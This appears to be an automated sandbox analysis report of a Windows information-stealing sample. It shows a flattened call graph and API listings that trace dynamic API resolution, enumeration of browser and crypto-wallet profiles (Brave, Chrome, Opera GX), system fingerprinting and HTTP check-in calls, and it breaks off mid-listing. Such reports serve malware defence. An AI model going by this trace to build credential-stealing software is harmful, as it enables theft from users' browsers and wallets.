GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80411->80414 80412->80411 80415 41703a GetProcAddress 80413->80415 80416 41704c 80413->80416 80414->80413 80415->80416 80417 417055 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80416->80417 80418 4170ac 80416->80418 80417->80418 80419 4170b5 GetProcAddress 80418->80419 80420 415af4 80418->80420 80419->80420 80421 40fb47 _EH_prolog 80420->80421 80422 40e912 lstrcpy 80421->80422 80423 40fb6e 80422->80423 80424 40e912 lstrcpy 80423->80424 80425 40fb85 GetSystemTime 80424->80425 80426 40fba3 80425->80426 80426->79639 80429 40ea54 80427->80429 80428 40ea78 80428->79648 80429->80428 80430 40ea66 lstrcpy lstrcat 80429->80430 80430->80428 80432 40e949 lstrcpy 80431->80432 80433 4010cc 80432->80433 80434 40e949 lstrcpy 80433->80434 80435 4010dc 80434->80435 80436 40e949 lstrcpy 80435->80436 80437 4010ec 80436->80437 80438 40e949 lstrcpy 80437->80438 80439 401108 80438->80439 80440 41283a _EH_prolog 80439->80440 80441 4121c3 _EH_prolog 80440->80441 80442 412860 80441->80442 80443 40e986 2 API calls 80442->80443 80444 412874 80443->80444 80445 40e986 2 API calls 80444->80445 80446 412884 80445->80446 80447 40e986 2 API calls 80446->80447 80448 412891 80447->80448 80449 40e912 lstrcpy 80448->80449 80450 41289e 80449->80450 80451 40e912 lstrcpy 80450->80451 80452 4128af 80451->80452 80453 40e912 lstrcpy 80452->80453 80454 4128c0 80453->80454 80455 40e912 lstrcpy 80454->80455 80456 4128d1 80455->80456 80457 40e912 lstrcpy 80456->80457 80458 4128e2 80457->80458 80459 40e912 lstrcpy 80458->80459 80486 4128f3 80459->80486 80460 40211b lstrcpy 80460->80486 80462 40214f lstrcpy 80462->80486 80463 412a1f StrCmpCA 80463->80486 80464 412ab5 StrCmpCA 80465 413376 80464->80465 80464->80486 80466 40e9d0 lstrcpy 80465->80466 80467 413385 80466->80467 81375 40214f 80467->81375 80470 40e9d0 lstrcpy 80472 41339f 80470->80472 80471 412c8c StrCmpCA 80473 41332e 80471->80473 80471->80486 81378 4022a8 lstrcpy 80472->81378 
80474 40e9d0 lstrcpy 80473->80474 80476 41333d 80474->80476 80475 402169 lstrcpy 80475->80486 81373 40219d lstrcpy 80476->81373 80480 413346 80483 40e9d0 lstrcpy 80480->80483 80481 4133b4 80484 40e9d0 lstrcpy 80481->80484 80482 412e63 StrCmpCA 80485 4132e9 80482->80485 80482->80486 80489 413357 80483->80489 80490 4133c2 80484->80490 80487 40e9d0 lstrcpy 80485->80487 80486->80460 80486->80462 80486->80463 80486->80464 80486->80471 80486->80475 80486->80482 80497 41303a StrCmpCA 80486->80497 80502 412046 33 API calls 80486->80502 80504 412bf6 StrCmpCA 80486->80504 80510 40219d lstrcpy 80486->80510 80512 41320b StrCmpCA 80486->80512 80514 4021b7 lstrcpy 80486->80514 80519 402253 lstrcpy 80486->80519 80520 402239 lstrcpy 80486->80520 80522 412dcd StrCmpCA 80486->80522 80527 411f59 28 API calls 80486->80527 80528 4021eb lstrcpy 80486->80528 80532 402205 lstrcpy 80486->80532 80533 4010b1 _EH_prolog lstrcpy 80486->80533 80537 402287 lstrcpy 80486->80537 80539 412fa4 StrCmpCA 80486->80539 80542 40e949 lstrcpy 80486->80542 80545 41317b StrCmpCA 80486->80545 80546 40e9d0 lstrcpy 80486->80546 81357 402135 80486->81357 81362 402183 lstrcpy 80486->81362 81363 4021d1 lstrcpy 80486->81363 81364 40221f lstrcpy 80486->81364 81365 40226d lstrcpy 80486->81365 80488 4132f8 80487->80488 81371 4021eb lstrcpy 80488->81371 81374 4022c2 lstrcpy 80489->81374 81379 412200 lstrcpy _EH_prolog 80490->81379 80495 413301 80498 40e9d0 lstrcpy 80495->80498 80496 4132d6 80499 40e9d0 lstrcpy 80496->80499 80497->80486 80500 413298 80497->80500 80501 413312 80498->80501 80509 413275 80499->80509 80503 40e9d0 lstrcpy 80500->80503 81372 4022dc lstrcpy 80501->81372 80502->80486 80505 4132a7 80503->80505 80504->80486 81369 402239 lstrcpy 80505->81369 81368 412200 lstrcpy _EH_prolog 80509->81368 80510->80486 80511 4132b0 80515 40e9d0 lstrcpy 80511->80515 80517 413226 80512->80517 80518 413216 Sleep 80512->80518 80514->80486 80516 4132c1 80515->80516 81370 4022f6 lstrcpy 80516->81370 80521 40e9d0 lstrcpy 
80517->80521 80518->80486 80519->80486 80520->80486 80523 413235 80521->80523 80522->80486 81366 402287 lstrcpy 80523->81366 80527->80486 80528->80486 80529 413293 80531 4124d3 _EH_prolog 80529->80531 80530 41323e 80534 40e9d0 lstrcpy 80530->80534 80535 413436 80531->80535 80532->80486 80533->80486 80536 41324f 80534->80536 81360 401061 _EH_prolog 80535->81360 81367 402310 lstrcpy 80536->81367 80537->80486 80539->80486 80540 413442 80547 4125e1 80540->80547 80542->80486 80543 413267 80544 40e9d0 lstrcpy 80543->80544 80544->80509 80545->80486 80546->80486 80548 40e9d0 lstrcpy 80547->80548 80549 4125f1 80548->80549 80550 40e9d0 lstrcpy 80549->80550 80551 4125fd 80550->80551 80552 40e9d0 lstrcpy 80551->80552 80553 412609 80552->80553 80554 4124d3 _EH_prolog 80553->80554 80555 4124f3 80554->80555 80555->79658 80557 40e960 80556->80557 80558 40e975 80557->80558 80559 40e96d lstrcpy 80557->80559 80558->79665 80559->80558 80560->79675 80562 40e912 lstrcpy 80561->80562 80563 402116 80562->80563 80564 40f52a _EH_prolog GetWindowsDirectoryA 80563->80564 80565 40f563 GetVolumeInformationA 80564->80565 80566 40f55c 80564->80566 80567 40f593 80565->80567 80566->80565 80568 40f5c5 GetProcessHeap HeapAlloc 80567->80568 80569 40f5e8 wsprintfA lstrcat 80568->80569 80570 40f5da 80568->80570 81380 40f4ef GetCurrentHwProfileA 80569->81380 80571 40e912 lstrcpy 80570->80571 80573 40f5e3 80571->80573 80573->79682 80574 40f618 80575 40f627 lstrlenA 80574->80575 80576 40f63b 80575->80576 81384 41013f lstrcpy malloc strncpy 80576->81384 80578 40f645 80579 40f653 lstrcat 80578->80579 80580 40f666 80579->80580 80581 40e912 lstrcpy 80580->80581 80582 40f677 80581->80582 80582->80573 80584 40e949 lstrcpy 80583->80584 80585 403b47 80584->80585 81385 403a76 _EH_prolog 80585->81385 80587 403b53 80588 40e912 lstrcpy 80587->80588 80589 403b70 80588->80589 80590 40e912 lstrcpy 80589->80590 80591 403b83 80590->80591 80592 40e912 lstrcpy 80591->80592 80593 403b94 80592->80593 80594 40e912 lstrcpy 
80593->80594 80595 403ba5 80594->80595 80596 40e912 lstrcpy 80595->80596 80597 403bb6 80596->80597 80598 403bc6 InternetOpenA StrCmpCA 80597->80598 80599 403be8 80598->80599 80600 404144 InternetCloseHandle 80599->80600 80601 40fb47 3 API calls 80599->80601 80614 404158 80600->80614 80602 403bfe 80601->80602 80603 40ea17 3 API calls 80602->80603 80604 403c11 80603->80604 80605 40e9d0 lstrcpy 80604->80605 80606 403c1e 80605->80606 80607 40ea8b 4 API calls 80606->80607 80608 403c47 80607->80608 80609 40e9d0 lstrcpy 80608->80609 80610 403c54 80609->80610 80611 40ea8b 4 API calls 80610->80611 80612 403c71 80611->80612 80613 40e9d0 lstrcpy 80612->80613 80615 403c7e 80613->80615 80614->79685 80616 40ea17 3 API calls 80615->80616 80617 403c9a 80616->80617 80618 40e9d0 lstrcpy 80617->80618 80619 403ca7 80618->80619 80620 40ea8b 4 API calls 80619->80620 80621 403cc4 80620->80621 80622 40e9d0 lstrcpy 80621->80622 80623 403cd1 80622->80623 80624 40ea8b 4 API calls 80623->80624 80625 403cee 80624->80625 80626 40e9d0 lstrcpy 80625->80626 80627 403cfb 80626->80627 80628 40ea8b 4 API calls 80627->80628 80629 403d19 80628->80629 80630 40ea17 3 API calls 80629->80630 80631 403d2c 80630->80631 80632 40e9d0 lstrcpy 80631->80632 80633 403d39 80632->80633 80634 403d51 InternetConnectA 80633->80634 80634->80600 80635 403d77 HttpOpenRequestA 80634->80635 80636 403db0 80635->80636 80637 40413b InternetCloseHandle 80635->80637 80638 403db4 InternetSetOptionA 80636->80638 80639 403dca 80636->80639 80637->80600 80638->80639 80640 40ea8b 4 API calls 80639->80640 80641 403ddb 80640->80641 80642 40e9d0 lstrcpy 80641->80642 80643 403de8 80642->80643 80644 40ea17 3 API calls 80643->80644 80645 403e04 80644->80645 80646 40e9d0 lstrcpy 80645->80646 80647 403e11 80646->80647 80648 40ea8b 4 API calls 80647->80648 80649 403e2e 80648->80649 80650 40e9d0 lstrcpy 80649->80650 80651 403e3b 80650->80651 80652 40ea8b 4 API calls 80651->80652 80653 403e59 80652->80653 80654 40e9d0 lstrcpy 80653->80654 80655 
403e66 80654->80655 80656 40ea8b 4 API calls 80655->80656 80657 403e83 80656->80657 80658 40e9d0 lstrcpy 80657->80658 80659 403e90 80658->80659 80660 40ea8b 4 API calls 80659->80660 80661 403ead 80660->80661 80662 40e9d0 lstrcpy 80661->80662 80663 403eba 80662->80663 80664 40ea17 3 API calls 80663->80664 80665 403ed6 80664->80665 80666 40e9d0 lstrcpy 80665->80666 80667 403ee3 80666->80667 80668 40ea8b 4 API calls 80667->80668 80669 403f00 80668->80669 80670 40e9d0 lstrcpy 80669->80670 80671 403f0d 80670->80671 80672 40ea8b 4 API calls 80671->80672 80673 403f2a 80672->80673 80674 40e9d0 lstrcpy 80673->80674 80675 403f37 80674->80675 80676 40ea17 3 API calls 80675->80676 80677 403f53 80676->80677 80678 40e9d0 lstrcpy 80677->80678 80679 403f60 80678->80679 80680 40ea8b 4 API calls 80679->80680 80681 403f7d 80680->80681 80682 40e9d0 lstrcpy 80681->80682 80683 403f8a 80682->80683 80684 40ea8b 4 API calls 80683->80684 80685 403fa8 80684->80685 80686 40e9d0 lstrcpy 80685->80686 80687 403fb5 80686->80687 80688 40ea8b 4 API calls 80687->80688 80689 403fd2 80688->80689 80690 40e9d0 lstrcpy 80689->80690 80691 403fdf 80690->80691 80692 40ea8b 4 API calls 80691->80692 80693 403ffc 80692->80693 80694 40e9d0 lstrcpy 80693->80694 80695 404009 80694->80695 80696 40ea17 3 API calls 80695->80696 80697 404025 80696->80697 80698 40e9d0 lstrcpy 80697->80698 80699 404032 80698->80699 80700 40e912 lstrcpy 80699->80700 80701 40404b 80700->80701 80702 40ea17 3 API calls 80701->80702 80703 40405f 80702->80703 80704 40ea17 3 API calls 80703->80704 80705 404072 80704->80705 80706 40e9d0 lstrcpy 80705->80706 80707 40407f 80706->80707 80708 40409f lstrlenA 80707->80708 80709 4040af 80708->80709 80710 4040b8 lstrlenA 80709->80710 81393 40eb3c 80710->81393 80712 4040c8 HttpSendRequestA 80713 404111 InternetReadFile 80712->80713 80714 404128 InternetCloseHandle 80713->80714 80717 4040d7 80713->80717 81394 40e97d 80714->81394 80716 40ea8b 4 API calls 80716->80717 80717->80713 80717->80714 
80717->80716 80718 40e9d0 lstrcpy 80717->80718 80718->80717 81398 40eb3c 80719->81398 80721 410c1d StrCmpCA 80722 410c28 ExitProcess 80721->80722 80723 410c2f 80721->80723 80724 410c3f strtok_s 80723->80724 80725 410d8c 80724->80725 80738 410c50 80724->80738 80725->79687 80726 410d71 strtok_s 80726->80725 80726->80738 80727 410ca0 StrCmpCA 80727->80726 80727->80738 80728 410d10 StrCmpCA 80728->80726 80728->80738 80729 410d25 StrCmpCA 80729->80726 80730 410c84 StrCmpCA 80730->80726 80730->80738 80731 410ce6 StrCmpCA 80731->80726 80731->80738 80732 410c68 StrCmpCA 80732->80726 80732->80738 80733 410cfb StrCmpCA 80733->80726 80733->80738 80734 410d3b StrCmpCA 80734->80726 80735 410d5d StrCmpCA 80735->80726 80736 410cbc StrCmpCA 80736->80726 80736->80738 80737 40e986 2 API calls 80737->80738 80738->80726 80738->80727 80738->80728 80738->80729 80738->80730 80738->80731 80738->80732 80738->80733 80738->80734 80738->80735 80738->80736 80738->80737 80740 40e949 lstrcpy 80739->80740 80741 4051b3 80740->80741 80742 403a76 6 API calls 80741->80742 80743 4051bf 80742->80743 80744 40e912 lstrcpy 80743->80744 80745 4051dc 80744->80745 80746 40e912 lstrcpy 80745->80746 80747 4051ef 80746->80747 80748 40e912 lstrcpy 80747->80748 80749 405200 80748->80749 80750 40e912 lstrcpy 80749->80750 80751 405211 80750->80751 80752 40e912 lstrcpy 80751->80752 80753 405222 80752->80753 80754 405232 InternetOpenA StrCmpCA 80753->80754 80755 405254 80754->80755 80756 405924 InternetCloseHandle 80755->80756 80758 40fb47 3 API calls 80755->80758 80757 40593f 80756->80757 81405 40628e CryptStringToBinaryA 80757->81405 80759 40526a 80758->80759 80760 40ea17 3 API calls 80759->80760 80762 40527d 80760->80762 80764 40e9d0 lstrcpy 80762->80764 80768 40528a 80764->80768 80765 40e986 2 API calls 80766 405958 80765->80766 80767 40ea8b 4 API calls 80766->80767 80769 405966 80767->80769 80771 40ea8b 4 API calls 80768->80771 80770 40e9d0 lstrcpy 80769->80770 80775 405972 80770->80775 80772 4052b3 80771->80772 
80773 40e9d0 lstrcpy 80772->80773 80774 4052c0 80773->80774 80776 40ea8b 4 API calls 80774->80776 80778 401061 _EH_prolog 80775->80778 80777 4052dd 80776->80777 80779 40e9d0 lstrcpy 80777->80779 80780 4059d0 80778->80780 80781 4052ea 80779->80781 80780->79693 80782 40ea17 3 API calls 80781->80782 80783 405306 80782->80783 80784 40e9d0 lstrcpy 80783->80784 80785 405313 80784->80785 80786 40ea8b 4 API calls 80785->80786 80787 405330 80786->80787 80788 40e9d0 lstrcpy 80787->80788 80789 40533d 80788->80789 80790 40ea8b 4 API calls 80789->80790 80791 40535a 80790->80791 80792 40e9d0 lstrcpy 80791->80792 80793 405367 80792->80793 80794 40ea8b 4 API calls 80793->80794 80795 405385 80794->80795 80796 40ea17 3 API calls 80795->80796 80797 405398 80796->80797 80798 40e9d0 lstrcpy 80797->80798 80799 4053a5 80798->80799 80800 4053bd InternetConnectA 80799->80800 80800->80756 80801 4053e3 HttpOpenRequestA 80800->80801 80802 40541a 80801->80802 80803 40591b InternetCloseHandle 80801->80803 80804 405434 80802->80804 80805 40541e InternetSetOptionA 80802->80805 80803->80756 80806 40ea8b 4 API calls 80804->80806 80805->80804 80807 405445 80806->80807 80808 40e9d0 lstrcpy 80807->80808 80809 405452 80808->80809 80810 40ea17 3 API calls 80809->80810 80811 40546e 80810->80811 80812 40e9d0 lstrcpy 80811->80812 80813 40547b 80812->80813 80814 40ea8b 4 API calls 80813->80814 80815 405498 80814->80815 80816 40e9d0 lstrcpy 80815->80816 80817 4054a5 80816->80817 80818 40ea8b 4 API calls 80817->80818 80819 4054c3 80818->80819 80820 40e9d0 lstrcpy 80819->80820 80821 4054d0 80820->80821 80822 40ea8b 4 API calls 80821->80822 80823 4054ee 80822->80823 80824 40e9d0 lstrcpy 80823->80824 80825 4054fb 80824->80825 80826 40ea8b 4 API calls 80825->80826 80827 405518 80826->80827 80828 40e9d0 lstrcpy 80827->80828 80829 405525 80828->80829 80830 40ea17 3 API calls 80829->80830 80831 405541 80830->80831 80832 40e9d0 lstrcpy 80831->80832 80833 40554e 80832->80833 80834 40ea8b 4 API calls 80833->80834 80835 

Control-flow Graph

APIs
• GetProcAddress.KERNEL32(74DD0000,00415AF4), ref: 0041668A
• GetProcAddress.KERNEL32 ref: 004166A1
• GetProcAddress.KERNEL32 ref: 004166B8
• GetProcAddress.KERNEL32 ref: 004166CF
• GetProcAddress.KERNEL32 ref: 004166E6
• GetProcAddress.KERNEL32 ref: 004166FD
• GetProcAddress.KERNEL32 ref: 00416714
• GetProcAddress.KERNEL32 ref: 0041672B
• GetProcAddress.KERNEL32 ref: 00416742
• GetProcAddress.KERNEL32 ref: 00416759
• GetProcAddress.KERNEL32 ref: 00416770
• GetProcAddress.KERNEL32 ref: 00416787
• GetProcAddress.KERNEL32 ref: 0041679E
• GetProcAddress.KERNEL32 ref: 004167B5
• GetProcAddress.KERNEL32 ref: 004167CC
• GetProcAddress.KERNEL32 ref: 004167E3
• GetProcAddress.KERNEL32 ref: 004167FA
• GetProcAddress.KERNEL32 ref: 00416811
• GetProcAddress.KERNEL32 ref: 00416828
• GetProcAddress.KERNEL32 ref: 0041683F
• GetProcAddress.KERNEL32 ref: 00416856
• GetProcAddress.KERNEL32 ref: 0041686D
• GetProcAddress.KERNEL32 ref: 00416884
• GetProcAddress.KERNEL32 ref: 0041689B
• GetProcAddress.KERNEL32 ref: 004168B2
• GetProcAddress.KERNEL32 ref: 004168C9
• GetProcAddress.KERNEL32 ref: 004168E0
• GetProcAddress.KERNEL32 ref: 004168F7
• GetProcAddress.KERNEL32 ref: 0041690E
• GetProcAddress.KERNEL32 ref: 00416925
• GetProcAddress.KERNEL32 ref: 0041693C
• GetProcAddress.KERNEL32 ref: 00416953
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0041696A
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416981
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416998
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004169AF
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004169C6
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004169DD
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 004169F4
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416A0B
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416A22
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416A39
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 00416A50
                                                                                                                                                                                                • LoadLibraryA.KERNEL32(00415AF4,?,00000040,00000064,00412598,00411C31,?,0000002C,00000064,00412517,00412554,?,00000024,00000064,Function_000121C3,004124D3), ref: 00416A61
                                                                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 00416A72
                                                                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 00416A83
                                                                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 00416A94
                                                                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 00416AA5
                                                                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 00416AB6
                                                                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 00416AC7
                                                                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 00416AD8
                                                                                                                                                                                                • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00416AE8
                                                                                                                                                                                                • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00416FB0
                                                                                                                                                                                                • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 00416FC6
                                                                                                                                                                                                • GetProcAddress.KERNEL32(6C970000,SymMatchString), ref: 004170BB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                                                                                                                                • API String ID: 2238633743-951535364
                                                                                                                                                                                                • Opcode ID: 02a848fa4e7c33424dc08f84c87d6b2e2d4eb3ab9048403a51dd9899c4eec50b
                                                                                                                                                                                                • Instruction ID: e03eed0801ec58f57f5b11818b4405cb7ce0920a969082d5a6e1302a6f7215fe
                                                                                                                                                                                                • Opcode Fuzzy Hash: 02a848fa4e7c33424dc08f84c87d6b2e2d4eb3ab9048403a51dd9899c4eec50b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6042D97E911620EFEB929FA0FD48A653BB3F70AB01B147439FA0586231D7364865EF50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040B705
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00424BD3,00424BD2,00000000,?,00424D1C,?,?,00424BCF,?,?,00000000), ref: 0040B7A6
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00424D20,?,?,00000000), ref: 0040B80D
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00424D24,?,?,00000000), ref: 0040B827
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00424D28,?,?,00424BD6,?,?,00000000), ref: 0040B8D8
                                                                                                                                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                • String ID: Brave$Google Chrome$H$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                                                • API String ID: 3869166975-1816240570
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004041D9
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 00403A76: _EH_prolog.MSVCRT ref: 00403A7B
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AAD
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB6
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABF
                                                                                                                                                                                                  • Part of subcall function 00403A76: lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403AD9
                                                                                                                                                                                                  • Part of subcall function 00403A76: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403AE9
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404220
                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00404227
                                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404246
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?), ref: 0040425A
                                                                                                                                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040427E
                                                                                                                                                                                                • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 004042B4
                                                                                                                                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042D8
                                                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042E3
                                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404301
                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404359
                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040438B
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00404394
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 0040439D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                • String ID: GET
                                                                                                                                                                                                • API String ID: 1687531150-1805413626
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 1B4A4EE1
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                • API String ID: 823142352-3829269058
                                                                                                                                                                                                • Opcode ID: b9fa8a1d3a11fd8627738a9737d6f3af24fd759ad8a35edf662cd4db341e5ea8
                                                                                                                                                                                                • Instruction ID: 8292b1eb1ed142b7558aef8602d3d9511895646fdd002ef7f8cb770271e1f32f
                                                                                                                                                                                                • Opcode Fuzzy Hash: b9fa8a1d3a11fd8627738a9737d6f3af24fd759ad8a35edf662cd4db341e5ea8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 92F1BF719043119BEB188F34D985BAF77E8BBA8315F00892DFDCAD6281D735D948CB92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040ECD9
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • GetKeyboardLayoutList.USER32(00000000,00000000,004251F7,00000000,?,00000000), ref: 0040ED0B
                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040ED19
                                                                                                                                                                                                • GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040ED24
                                                                                                                                                                                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040ED4E
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 0040EDF2
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
